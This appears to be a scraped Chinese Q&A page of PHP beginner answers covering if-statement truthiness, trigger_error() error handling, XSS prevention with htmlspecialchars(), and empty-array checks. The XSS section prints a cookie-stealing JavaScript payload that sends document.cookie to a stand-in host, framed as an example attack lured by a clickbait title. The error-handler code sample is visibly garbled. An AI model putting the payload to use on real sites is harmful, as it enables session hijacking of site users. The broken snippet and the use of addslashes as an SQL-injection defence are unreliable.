php怎么使用if,if括号里面的变量是什么意思?
if语句用来判断所包含值的布尔值,既true和false两值,通过判断变量的布尔值来决定if语句的操作。
在if语句里变量可以直接被分析布尔值也就是当前转换的意思。
当转换为 boolean 时,以下值被认为是 FALSE:
布尔值 FALSE
整型值 0(零)
浮点型值 0.0(零)
空白字符串和字符串 "0"
没有成员变量的数组
没有单元的对象(仅适用于 PHP 4)
特殊类型 NULL(包括尚未设定的变量)
如果变量是这些值在if里就是false,其他的一般为true
PHP错误处理函数?
trigger_error() 用于在用户指定的条件下触发一个错误消息。它与内建的错误处理器一同使用,也可以与由 set_error_handler() 函数创建的用户自定义函数使用 定义和用法trigger_error() 函数创建用户定义的错误消息。trigger_error() 用于在用户指定的条件下触发一个错误消息。它与内建的错误处理器一同使用,也可以与由 set_error_handler() 函数创建的用户自定义函数使用。 如果指定了一个不合法的错误类型,该函数返回 false,否则返回 true。 语法trigger_error(error_message,error_types) 参数描述error_message必需。规定错误消息。长度限制为 1024 个字符。error_types可选。规定错误消息的错误类型。 可能的值: •E_USER_ERROR •E_USER_WARNING •E_USER_NOTICE 复制代码代码如下:My ERROR[$errno] $errstr"; echo "Fatal error in line $errline of file $errfile"; exit(1); break; case E_USER_WARNING: echo "My WARNING [$errno] $errstr"; break; default: echo "Unknown error type:[$errno] $errstr"; break; } } set_error_handler("myError"); $age=-100; if($age=0',E_USER_ERROR); } ?>
PHP如何防止XSS攻击?
XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容。
HTML是一种超文本标记语言,通过将一些字符特殊地对待来区别文本和标记,例如,小于符号(<)被看作是HTML标签的开始,<title>与</title>之间的字符是页面的标题等等。当动态页面中插入的内容含有这些特殊字符(如<)时,用户浏览器会将其误认为是插入了HTML标签,当这些HTML标签引入了一段JavaScript脚本时,这些脚本程序就将会在用户浏览器中执行。所以,当这些特殊字符不能被动态页面检查或检查出现失误时,就将会产生XSS漏洞。
当然我会将标题设计的非常吸引人点击,比如 “陈冠希艳照又有流出2012版(20P无码)” ,这样如果我将里面的alert换成恶意代码,比如:
location.href='http://www.xss.com?cookie='+document.cookie’;或者<a href='http://www.xss.com?cookie='+document.cookie>。用户的cookie我也拿到了,如果服务端session没有设置过期的话,我以后甚至拿这个cookie而不需用户名密码,就可以以这个用户的身份登录成功了。
预防XSS攻击
从根本上说,解决办法是消除网站的XSS漏洞,这就需要网站开发者运用转义安全字符等手段,始终把安全放在心上。
简单点,就是过滤从表单提交来的数据,使用php过滤函数就可以达到很好的目的。
htmlspecialchars() 函数
代码实例:
<?php
if (isset($_POST['name'])){
$str = trim($_POST['name']); //清理空格
$str = strip_tags($str); //过滤html标签
$str = htmlspecialchars($str); //将字符内容转化为html实体
$str = addslashes($str); //防止SQL注入
echo $str;
}
?>
<form method="post" action="">
<input name="name" type="text">
<input type="submit" value="提交" >
</form>
具体操作无法一一写出,需要你边实践边摸索
php如何判断数组为空?
数组为空.指的是数组里面没有包含任何元素.判断数组为空的方式有很多种:以下 一一列出来empty($array_test) //如果数组$array_test为空那么这个函数返回trueif($array_test) //如果数组为空.那么if的条件判断为falsecount($array_test) //计算数组元素个数.为0就是空sizeof($array_test) //count() 的别名 用法和返回一样//实际上还有一些方式可以判断数组是否为空.常用的就是这些补充一下如果数组没有被定义还可以使用isset($array_test)//判断数组是否被定义
怎么判断变量等于几?
比如你有这几个值:abc bcd def qwe asd 写成数组就是这样 $arr=array('abc','bcd','def','qwe','asd');//定义数组 $aa = in_array('abc',$arr);IN_aray()函数用于判断某个值是否在数组里! 如果是返回TRUE,否则返回FALSE;
if($aa){ echo "abc在数组中"; }else{ echo "abc不在数组中"; } 运行结果输出是“abc在数组中” LZ可以换几个值试试